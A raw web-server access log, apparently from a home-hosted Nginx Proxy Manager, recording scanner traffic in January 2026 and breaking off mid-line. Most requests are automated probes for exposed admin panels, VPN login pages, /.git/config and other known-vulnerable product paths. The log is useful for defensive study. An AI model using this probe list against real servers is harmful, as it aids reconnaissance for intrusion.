+[23/Jan/2026:23:36:31 +0000] 200 - GET http 91.82.83.208 "/" [Client 61.239.212.14] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.3" "-" +[23/Jan/2026:23:42:06 +0000] 400 - GET http 91.82.83.208 "/manager/html" [Client 40.124.172.146] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" +[23/Jan/2026:23:56:56 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:23:58:26 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 198.235.24.206] [Length 1033] [Gzip -] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[23/Jan/2026:23:59:28 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[23/Jan/2026:23:59:35 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[24/Jan/2026:00:00:29 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:00:04:03 +0000] 400 - GET http 91.82.83.208 "/" [Client 95.215.0.144] [Length 252] [Gzip -] "fasthttp" "-" +[24/Jan/2026:00:04:03 +0000] 400 - GET http 91.82.83.208 "/aaa9" [Client 46.161.50.108] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[24/Jan/2026:00:04:03 +0000] 400 - GET http 91.82.83.208 "/aab9" [Client 46.161.50.108] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[24/Jan/2026:00:16:05 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:00:16:12 +0000] 404 - GET http 91.82.83.208 "/.git/config" [Client 77.83.39.218] [Length 122] [Gzip 1.35] "Offline Explorer/2.5" "-" +[24/Jan/2026:00:18:54 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:00:24:00 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:00:39:29 +0000] 200 - GET http 91.82.83.208 "/" [Client 185.242.226.106] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" +[24/Jan/2026:00:45:07 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.51] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" "-" +[24/Jan/2026:00:45:20 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:00:48:31 +0000] 400 - GET http 91.82.83.208 "/" [Client 92.63.197.50] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36" "-" +[24/Jan/2026:00:49:23 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:00:58:18 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:01:12:10 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:01:14:57 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:01:19:19 +0000] 200 - GET http 91.82.83.208 "/" [Client 93.189.222.80] [Length 1033] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" "-" +[24/Jan/2026:01:19:21 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[24/Jan/2026:01:19:44 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 139.162.173.209] [Length 1033] [Gzip -] "-" "-" +[24/Jan/2026:01:19:46 +0000] 200 - GET http 91-82-83-208.pool.digikabel.hu "/" [Client 139.162.173.209] [Length 1033] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:46 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 139.162.173.209] [Length 1033] [Gzip -] "-" "-" +[24/Jan/2026:01:19:46 +0000] 200 - GET http 91-82-83-208.pool.digikabel.hu "/" [Client 139.162.173.209] [Length 1033] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:46 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/health" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:46 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/rest/applinks/1.0/manifest" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:46 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/nmaplowercheck1769217584" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:46 +0000] 400 - GET http localhost "/" [Client 139.162.173.209] [Length 252] [Gzip -] "-" "-" +[24/Jan/2026:01:19:46 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/index.aspx" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:46 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/nmaplowercheck1769217585" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:46 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:46 +0000] 400 - GET http localhost "/" [Client 139.162.173.209] [Length 252] [Gzip -] "-" "-" +[24/Jan/2026:01:19:46 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/index.aspx" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:47 +0000] 404 - POST http 91-82-83-208.pool.digikabel.hu "/sdk" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:47 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/HNAP1" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:47 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/confluence/rest/applinks/1.0/manifest" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:47 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/main.cfm" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:47 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/evox/about" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:47 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/human.aspx?arg12=infotech" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:47 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/webui" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:47 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/dana-cached/hc/HostCheckerInstaller.osx" [Client 139.162.173.209] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:47 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/user" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:47 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/+CSCOE+/logon.html" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:47 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/favicon.ico" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:47 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/user" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:47 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/human.aspx?arg12=infotech" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:47 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/dana-na/nc/nc_gina_ver.txt" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:47 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/main.cfm" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:47 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/webui" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:47 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/menu.html" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:47 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[24/Jan/2026:01:19:47 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/login.php" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:47 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/CFIDE/componentutils/" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:47 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/dana-cached/hc/HostCheckerInstaller.osx" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:47 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/geoserver/index.html" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:47 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/dniapi/userInfos" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:47 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/geoserver/" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:47 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/menu.html" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:47 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/dashboard/" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:47 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/admin.jhtml" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:47 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/webui" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:47 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/geoserver/index.html" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:47 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/api/v2/about" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:47 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/CFIDE/componentutils/" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:47 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/login.php" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:47 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/health" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:47 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/geoserver/web/wicket/bookmarkable/org.geoserver.web.AboutGeoServerPage" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:47 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/geoserver/web/wicket/bookmarkable/org.geoserver.web.AboutGeoServerPage" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:47 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/Account/Login" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:47 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/fog/management/index.php?node=client&sub=logininfo" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:47 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/Account/Login" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:47 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/cgi-bin/info.cgi" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/webui/index.html" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/inicio.php" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/api/v1/check-version" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 200 - GET http 91-82-83-208.pool.digikabel.hu "/" [Client 139.162.173.209] [Length 1033] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/admin.jhtml" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/dashboard/" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/magento_version" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/xml/info.xml" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/cgi-bin/info.cgi" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/xml/info.xml" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/helpdesk/WebObjects/Helpdesk.woa" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/geoserver/" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/owa/" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/+CSCOE+/logon.html" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/home.jhtml" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/cluster/list.query" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/apps/zxtm/login.cgi" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/api/server/version" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/fog/management/index.php?node=client&sub=logininfo" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/magento_version" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/cgi-mod/header_logo.cgi?size=big" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/webui/index.html" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/administrator/manifests/files/joomla.xml" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/inicio.php" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/owa/" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/helpdesk/WebObjects/Helpdesk.woa" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 400 - POST http 91-82-83-208.pool.digikabel.hu "/sdk" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/index.php" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/rest/applinks/1.0/manifest" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/versa/login" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/language/en-GB/en-GB.xml" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/administrator/manifests/files/joomla.xml" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/apps/zxtm/login.cgi" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:48 +0000] 404 - GET http 